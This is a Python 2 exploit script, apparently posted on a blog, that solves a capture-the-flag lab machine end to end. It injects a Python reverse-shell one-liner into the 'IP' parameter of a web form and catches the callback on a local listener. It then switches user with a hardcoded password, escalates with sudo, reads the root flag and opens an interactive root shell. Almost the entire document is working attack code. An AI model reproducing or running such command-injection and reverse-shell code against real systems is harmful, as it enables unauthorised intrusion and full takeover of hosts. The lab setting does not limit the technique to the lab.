This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from urllib import urlencode | |
| import urllib | |
| import urllib2 | |
| import socket | |
| import sys | |
| import threading | |
| import time | |
| rhost = "192.168.12.131" | |
| rport = 33447 | |
| lhost = "192.168.12.129" | |
| lport = 4444 | |
| revcmd = '1;python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'' % (lhost,lport) | |
| postfields= { | |
| 'submit' : 1337, | |
| 'IP' : revcmd, | |
| } | |
| url = 'http://%s:%d/Challenge/Magic_Box/low.php' % ( rhost, rport) | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.settimeout(10) | |
| def get_all_response(client): | |
| time.sleep(.5) # delays for 1 second | |
| recv_len = 1 | |
| response = "" | |
| while recv_len: | |
| data = client.recv(100) | |
| recv_len = len(data) | |
| response+= data | |
| #print recv_len | |
| if recv_len < 100: | |
| break | |
| print response | |
| return response | |
| def loop_me(client): | |
| print "dropping into root shell" | |
| inpt = "" | |
| while (inpt != "exit"): | |
| inpt = raw_input("> ") | |
| client.send(inpt+"\n") | |
| get_all_response(client) | |
| def rev_hndlr(): | |
| client_sock = False | |
| #Bind socket to local host and port | |
| try: | |
| s.bind((lhost, lport)) | |
| except socket.error as msg: | |
| print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1] | |
| sys.exit() | |
| print 'Socket bind complete' | |
| #Start listening on socket | |
| s.listen(10) | |
| print 'Socket now listening' | |
| while not client_sock: | |
| client_sock, addr = s.accept() | |
| print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1]) | |
| get_all_response(client_sock) | |
| client_sock.send("python -c 'import pty;pty.spawn(\"/bin/bash\") '\n") | |
| get_all_response(client_sock) | |
| client_sock.send("su saman\n") | |
| get_all_response(client_sock) | |
| print "1337hax0r" | |
| client_sock.send("1337hax0r\n") | |
| get_all_response(client_sock) | |
| client_sock.send("sudo -i\n") | |
| get_all_response(client_sock) | |
| client_sock.send("1337hax0r\n") | |
| print "1337hax0r" | |
| get_all_response(client_sock) | |
| client_sock.send("cat /root/flag.txt\n") | |
| get_all_response(client_sock) | |
| loop_me(client_sock) | |
| def main(): | |
| rev_thread = threading.Thread(target=rev_hndlr) | |
| rev_thread.start() | |
| params = urlencode(postfields) | |
| print params | |
| print 'Params encoded' | |
| print 'URL (%s) opening with params (%s)' % (url,urllib.unquote(params).decode('utf8') ) | |
| print urllib2.urlopen(url, data=params).read() | |
| print 'URL (%s) opened' % (url) | |
| main() |
No comments:
Post a Comment